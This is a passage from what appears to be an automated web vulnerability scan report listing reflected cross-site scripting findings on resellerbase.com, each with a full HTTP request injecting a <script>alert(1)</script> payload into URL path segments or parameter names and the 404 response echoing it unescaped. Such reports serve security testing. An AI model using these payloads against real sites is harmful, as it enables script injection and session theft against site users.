Date: Thu, 18 Nov 2010 00:46:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating7a256<script>alert(1)</script>6cf8caed516/2half.gif was not found on this server.</p>
...[SNIP]...

2.731. http://www.resellerbase.com/communication/themes/kosmos/images/rating/2half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 2a28b<script>alert(1)</script>f26e7fe6e6d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/rating/2half.gif2a28b<script>alert(1)</script>f26e7fe6e6d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating/2half.gif2a28b<script>alert(1)</script>f26e7fe6e6d was not found on this server.</p>
...[SNIP]...

2.732. http://www.resellerbase.com/communication/themes/kosmos/images/rating/2half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/2half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3dbbc<script>alert(1)</script>5d5a429a267 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/rating/2half.gif?3dbbc<script>alert(1)</script>5d5a429a267=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating/2half.gif?3dbbc<script>alert(1)</script>5d5a429a267=1 was not found on this server.</p>
...[SNIP]...

2.733. http://www.resellerbase.com/communication/themes/kosmos/images/rating/4.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 48f31<script>alert(1)</script>d7e2c3f17df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication48f31<script>alert(1)</script>d7e2c3f17df/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication48f31<script>alert(1)</script>d7e2c3f17df/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.734. http://www.resellerbase.com/communication/themes/kosmos/images/rating/4.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1b624<script>alert(1)</script>a09de9fa1ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes1b624<script>alert(1)</script>a09de9fa1ef/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes1b624<script>alert(1)</script>a09de9fa1ef/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.735. http://www.resellerbase.com/communication/themes/kosmos/images/rating/4.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c0266<script>alert(1)</script>0d8ce9279d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmosc0266<script>alert(1)</script>0d8ce9279d/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmosc0266<script>alert(1)</script>0d8ce9279d/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.736. http://www.resellerbase.com/communication/themes/kosmos/images/rating/4.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bdf62<script>alert(1)</script>7ea9535b9ba was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/imagesbdf62<script>alert(1)</script>7ea9535b9ba/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/imagesbdf62<script>alert(1)</script>7ea9535b9ba/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.737. http://www.resellerbase.com/communication/themes/kosmos/images/rating/4.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e445a<script>alert(1)</script>e9be285c159 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/ratinge445a<script>alert(1)</script>e9be285c159/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/ratinge445a<script>alert(1)</script>e9be285c159/4.gif was not found on this server.</p>
...[SNIP]...

2.738. http://www.resellerbase.com/communication/themes/kosmos/images/rating/4.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload ef829<script>alert(1)</script>8d908baa82c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/rating/4.gifef829<script>alert(1)</script>8d908baa82c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating/4.gifef829<script>alert(1)</script>8d908baa82c was not found on this server.</p>
...[SNIP]...

2.739. http://www.resellerbase.com/communication/themes/kosmos/images/rating/4.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/4.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b4ce2<script>alert(1)</script>1486976a136 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/rating/4.gif?b4ce2<script>alert(1)</script>1486976a136=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating/4.gif?b4ce2<script>alert(1)</script>1486976a136=1 was not found on this server.</p>
...[SNIP]...

2.740. http://www.resellerbase.com/communication/themes/kosmos/images/rating/5.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 10bd5<script>alert(1)</script>8357d8bad7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication10bd5<script>alert(1)</script>8357d8bad7a/themes/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication10bd5<script>alert(1)</script>8357d8bad7a/themes/kosmos/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.741. http://www.resellerbase.com/communication/themes/kosmos/images/rating/5.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fc3b7<script>alert(1)</script>6ff55061869 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themesfc3b7<script>alert(1)</script>6ff55061869/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themesfc3b7<script>alert(1)</script>6ff55061869/kosmos/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.742. http://www.resellerbase.com/communication/themes/kosmos/images/rating/5.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 546cb<script>alert(1)</script>c18a5fdac78 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos546cb<script>alert(1)</script>c18a5fdac78/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos546cb<script>alert(1)</script>c18a5fdac78/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.743. http://www.resellerbase.com/communication/themes/kosmos/images/rating/5.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cd9a2<script>alert(1)</script>07c4d74b189 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/imagescd9a2<script>alert(1)</script>07c4d74b189/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/imagescd9a2<script>alert(1)</script>07c4d74b189/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.744. http://www.resellerbase.com/communication/themes/kosmos/images/rating/5.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bebd7<script>alert(1)</script>eb571cc4770 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/ratingbebd7<script>alert(1)</script>eb571cc4770/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/ratingbebd7<script>alert(1)</script>eb571cc4770/5.gif was not found on this server.</p>
...[SNIP]...

2.745. http://www.resellerbase.com/communication/themes/kosmos/images/rating/5.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1dfa1<script>alert(1)</script>dc12b55ee17 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/rating/5.gif1dfa1<script>alert(1)</script>dc12b55ee17 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating/5.gif1dfa1<script>alert(1)</script>dc12b55ee17 was not found on this server.</p>
...[SNIP]...

2.746. http://www.resellerbase.com/communication/themes/kosmos/images/rating/5.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/5.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ffdeb<script>alert(1)</script>5c5e66d3d3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/rating/5.gif?ffdeb<script>alert(1)</script>5c5e66d3d3e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating/5.gif?ffdeb<script>alert(1)</script>5c5e66d3d3e=1 was not found on this server.</p>
...[SNIP]...

2.747. http://www.resellerbase.com/communication/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3bd42<script>alert(1)</script>3ca2abf7f90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication3bd42<script>alert(1)</script>3ca2abf7f90/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication3bd42<script>alert(1)</script>3ca2abf7f90/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.748. http://www.resellerbase.com/communication/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload af938<script>alert(1)</script>1757c3492a1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themesaf938<script>alert(1)</script>1757c3492a1/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themesaf938<script>alert(1)</script>1757c3492a1/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.749. http://www.resellerbase.com/communication/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 91b89<script>alert(1)</script>c421ec8ce3d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos91b89<script>alert(1)</script>c421ec8ce3d/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

